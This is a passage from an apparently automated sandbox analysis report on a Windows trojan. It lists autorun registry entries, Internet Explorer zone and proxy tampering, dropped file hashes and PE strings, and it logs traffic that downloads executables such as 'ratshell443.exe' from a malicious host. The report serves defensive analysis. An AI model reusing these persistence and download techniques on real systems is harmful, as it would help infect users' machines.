[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 8F 1E BE D5 94 10 F9 36 BE 03 C5 D3 3C 8F DA"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 44 0B 96 EA 08 30 BC 7F 68 9E AC B0 84 55 26"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 32 35 78 D9 64 26 02 77 86 DA AB 72 14 27 11"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 2B 32 F6 79 DF D7 DE 11 97 C9 8E E9 5E 01 FB"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 98 C7 AE 54 96 D5 54 81 09 09 A1 11 C7 C6 9E"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 B4 D5 BB 11 CD E8 A7 02 F4 DF E4 CB 97 75 67"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 3A 93 F3 0F A4 63 58 FC 2A 5C 47 31 1D 41 A1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C6 89 C6 50 71 1E 52 78 E1 EB 04 58 9A E2 C3"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 EF 4A B4 3D FF 01 E1 5F 16 41 EB 66 EA BC D0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 C1 AD 74 56 93 F3 39 54 1A 20 26 62 B4 E2 F7"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 6D 27 EB 29 59 AC AF A0 21 19 BA 70 09 96 49"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 78 5B DF C3 41 DC E3 E9 E5 C5 42 C8 C3 13 7C"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Big Fish Games\Persistence\Install]
"(Default)" = "{4CFDE078-C665-429D-9A80-1C8F5D0EF06D}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Big Fish Games\Persistence\EnabledToolbars]
"1" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 7B F9 92 F0 A7 F4 46 4D 69 BD 47 84 04 6B B7"

[HKLM\SOFTWARE\Big Fish Games]
"Upgraded" = "0"

[HKLM\SOFTWARE\Big Fish Games\Persistence]
"MSFT_DirectX_EULA_Accepted" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Big Fish Games\Client]
"GameClubMember" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
9a78a4f43e8b5b5d8a902fd62652f31c c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe
ecdb92b185077fffcd650ea65cf5d510 c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe
334b41d348990d25241a5d4aba42391b c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
e1d7bc3fcbadd4cf8b5a27b5edad90c2 c:\Documents and Settings\"%CurrentUserName%"\Application DataFilename.exe
5d9984768c24fda50bc27f26301d414c c:\Documents and Settings\"%CurrentUserName%"\CrashHandler.exe
3ed972db9e8adf26a3bfd1c038922ffb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE
7ec86b3094b76ab39cfe287b8e3e6737 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE
02d7f5e5dd1512bee2343a21d9970eba c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\NSISdl.dll
959ea64598b9a3e494c00e8fa793be7e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\System.dll
d16e06c5de8fb8213a0464568ed9852f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\UserInfo.dll
bf1ccc7f5c46e024e800f6c1e9df8206 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\inetc.dll
fae3be7a9827eaa3ef9f43832805e110 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\nsProcess.dll
4e1c46e37af4b3ab0036cb1e85c81608 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\uac.dll
689a3befb2abc9a4c968dab1bd33a965 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\AccessControl.dll
959ea64598b9a3e494c00e8fa793be7e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\System.dll
d16e06c5de8fb8213a0464568ed9852f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\UserInfo.dll
4e1c46e37af4b3ab0036cb1e85c81608 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\uac.dll
cb3897fff233b89fe46c52f4a86636f6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\System.dll
f2805a876754590f252130d367f382ff c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\UserInfo.dll
cb3897fff233b89fe46c52f4a86636f6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxA.tmp\System.dll
f2805a876754590f252130d367f382ff c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxA.tmp\UserInfo.dll
e1d7bc3fcbadd4cf8b5a27b5edad90c2 c:\Documents and Settings\"%CurrentUserName%"\Ptype.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 26860 27136 4.29791 ab9512ee7c9f5ad72ae20fba64a6341e
.itext 32768 776 1024 3.22992 c79df70a8b89425189a65adf4e08a6b8
.data 36864 2040 2048 0.904367 240816d5b34f6e1e38eab9c91fbec05d
.bss 40960 11172 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 53248 2246 2560 2.90066 4b57ef8451a1099532bf2707e4ad39e3
.tls 57344 8 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 61440 24 512 0.14174 15b26e576cc064822312d1c66bb6f693
.reloc 65536 3612 4096 4.20936 92c609bf93bf264697ab3000df42f30f
.rsrc 69632 243268 243712 5.30233 376efca94063269884d49f0950403f04

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://allpokersoftware.net/chromelog.exe 89.233.106.130
hxxp://allpokersoftware.net/Ptype.exe
hxxp://allpokersoftware.net/ratshell443.exe
hxxp://208.77.152.196/server_time.php


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Python-urllib/ Suspicious User Agent
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers

Traffic

GET /Ptype.exe HTTP/1.1
Host: allpokersoftware.net


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:03 GMT
Server: Apache
Last-Modified: Tue, 08 Apr 2014 16:56:32 GMT
Accept-Ranges: bytes
Content-Length: 99328
Connection: close
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...m!DS
.................z..........N.... ........@.. ........................
[email protected]...........
................................................................. ....
........... ..H............text...Ty... ...z.................. ..`.rsr
c...h............|..............@[email protected]............................
[email protected].......,d...4......3....9... ..........
................................6.(.....o....*...0..!........,..{....,
..{....o........(.....*....................0..F........s....o.....s...
.o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o..
...s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....o
....o.....o....o.....o....o.....o.....o....(....o.....o....r...p"...A.
..s....o.....o....(....o.....o........(.....o.....o....r ..po.....o...
....K..(.....o.....o.....o.....o....r ..po ....o.....o!....o.....o"...
.o....(....o.....o....r...p"...A...s....o.....o....(....o.....o.......
.(.....o.....o....rO..po.....o.......X..(.....o.....o.....o.....o....r
O..po ....o.....o!....o....(....o#....o....r...p"...A...s....o.....o..
..(....o$....o.....o%....o........(.....o.....o....r}..po.....o.......
y..(.....o.....o.....o.....o.....o&....o....(....o'....o....r...p"...A
...s....o.....o....(....o.....o........(.....o.....o....r...po.....o..
.....-..(.....o.....o.....o.....o....r...po(....o.....o&....o....(
<<< skipped >>>


GET /server_time.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.bigfishgames.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: mkt_code=bfgdefault; afsrc=afxxxxxxxxxx; PHPSESSID=5r93onv1a77cmf81855jfbaah2


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:15 GMT
Server: Apache
Vary: X-Client-IP,Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 36
Keep-Alive: timeout=15, max=10000
Connection: Keep-Alive
Content-Type: text/html
{"now":1397743395,"12am":1397718000}....


GET /server_time.php HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.bigfishgames.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: afsrc=afxxxxxxxxxx; mkt_code=bfgdefault; PHPSESSID=5r93onv1a77cmf81855jfbaah2


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:15 GMT
Server: Apache
Vary: X-Client-IP,Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.big



GET /ratshell443.exe HTTP/1.0
Host: allpokersoftware.net
User-Agent: Python-urllib/1.17


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:08 GMT
Server: Apache
Last-Modified: Wed, 02 Apr 2014 21:24:12 GMT
Accept-Ranges: bytes
Content-Length: 5889983
Connection: close
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........}..V...V...
V....SU.S..._dG.~..._dV.G...q..._...V...'[email protected]..._dR.W...Ri
chV...................PE..L...m.$N.................>...f......A....
[email protected]........................
.................d.......^............................................
...................@............P...............................text..
..<.......>.................. ..`.rdata...^...P...`...B.........
.....@[email protected][email protected]...^............
...............@..@...................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......................................................x......A.3...$t
...SU..$....V..$....Wj.3.j..\[email protected]..%Q.... .D$0
P.D$......\$..D$ ...... PA.......\$4.\$8.\$<.D$\....f.L$`..N..P.G..
.P.JK...D$p..N.... P./...P.2K...D$|[email protected]...
$......RA...$.......RA...$......f..$........T$~....@:.u..|$t .O..O.G:.
u...........D$t...P..._I......L$ Q.T$4RSSSj.S.D$0P...PA.PU...PA._^][..
t4.L$.j.Q...PA..D$...$RP...PA...$..$t...3...S....x....h.QA........$x..
....3......S....x......................A.3...$....h.....D$.j.P..S.
<<< skipped >>>


GET /chromelog.exe HTTP/1.1
Host: allpokersoftware.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:02:57 GMT
Server: Apache
Last-Modified: Mon, 07 Apr 2014 23:52:52 GMT
Accept-Ranges: bytes
Content-Length: 3666664
Connection: close
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........}..V...V...
V....SU.S..._dG.~..._dV.G...q..._...V...'[email protected]..._dR.W...Ri
chV...................PE..L...m.$N.................>...d......A....
[email protected]..........................
.................d.......h............................................
...................@............P...............................text..
..<.......>.................. ..`.rdata...^...P...`...B.........
.....@[email protected][email protected]............
...............@..@...................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......................................................x......A.3...$t
...SU..$....V..$....Wj.3.j..\[email protected]..%Q.... .D$0
P.D$......\$..D$ ...... PA.......\$4.\$8.\$<.D$\....f.L$`..N..P.G..
.P.JK...D$p..N.... P./...P.2K...D$|[email protected]...
$......RA...$.......RA...$......f..$........T$~....@:.u..|$t .O..O.G:.
u...........D$t...P..._I......L$ Q.T$4RSSSj.S.D$0P...PA.PU...PA._^][..
t4.L$.j.Q...PA..D$...$RP...PA...$..$t...3...S....x....h.QA........$x..
....3......S....x......................A.3...$....h.....D$.j.P..S.
<<< skipped >>>









HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE_1648:




.text
`.rdata
@.data
.ndata
.rsrc
tDSSh
%s %s
... %d%%
verifying installer: %d%%
ADVAPI32.dll
~nsu.tmp\
shlwapi.dll
%u.%u%s%s
KERNEL32.dll
.DEFAULT\Control Panel\International
*?|<>/":
\wininit.ini
%s=%s
%Program Files%
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegDeleteKeyA
RegCloseKey
RegEnumKeyA
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
ole32.dll
VERSION.dll
Au_.exe
RichEd20.dll
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /D=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
PLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
\System.dll
Thawte Certification1
http://ocsp.thawte.com0
.http://crl.thawte.com/ThawteTimestampingCA.crl0
http://ts-ocsp.ws.symantec.com07
 http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at https://www.verisign.com/rpa (c)101.0,
/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0;
/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0
https://www.verisign.com/cps0*
#http://logo.verisign.com/vslogo.gif04
#http://crl.verisign.com/pca3-g5.crl04
http://ocsp.verisign.com0
Nullsoft Install System v2.46-Unicode
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp
nsi2.tmp
%Documents and Settings%\All Users\Application Data\BigFishCache
XR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE"
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
4! # #%%$#
J(.Bu
Nullsoft Install System v06-Dec-2010.cvs
3.3.0.2
04090000
04070000

HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe_1128:




.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
2 2034383@3
GetProcessHeap
GetCPInfo
nsProcess.dll
;#;7;`;};
KERNEL32.DLL
NTDLL.DLL
Run-Time Check Failure #%d - %s
Kernel32.dll
MSPDB71.DLL
IMAGEHLP.DLL
RegOpenKeyExA
ADVAPI32.DLL
mscoree.dll
Client hook allocation failure at file %hs line %d.
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
Client hook re-allocation failure at file %hs line %d.
DAMAGE: after %hs block (#%d) at 0x%p.
DAMAGE: before %hs block (#%d) at 0x%p.
%hs allocated at file %hs(%d).
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
crt block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
%hs(%d) :
#File Error#(%d) :
Data: <%s> %s
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
%s(%d) : %s
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
user32.dll
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
GetProcessWindowStation
f:\vs70builds\3077\vc\crtbld\crt\src\sprintf.c
f:\vs70builds\307
6q2.EC
.ssXV
)-.Yln
Nullsoft Install System v2.46-Unicode
verifying installer: %d%%
... %d%%
http://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
timestamp>ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl8.tmp
inetc.dll
nning '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'
id>493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
me_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa4.tmp\inetc.dll
>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
Execute: "%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
bfgsetup_s1_l1.exe
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe
nts and Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
tdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
EID":"1", "STUB_SITEID":"1", "COUNTER":"0","UPGRADESOURCE":"DOWNLOAD", "VERSION_TO":"%VERSION_TO%", "VERSION_FROM":"0.0.0.0", "OSNAME":"XP", "OSVERSION":"5.1.2600.5512", "INSTALLATION_STATUS":"%INSTALLATION_STATUS%","ERROR_LEVEL":"%ERROR_LEVEL%"}
sion="1.0" encoding="utf-16" ?>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a8640
7P9MT7EX72W..exe
1397743395
wnload, running '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'
493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
FG_Monitor_f8c5f096-93d6-4f5f-8474-fc53d9c7540c
sage>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy6.tmp
>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
bfggameservices.exe
?xml version="1.0" encoding="utf-16" ?>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
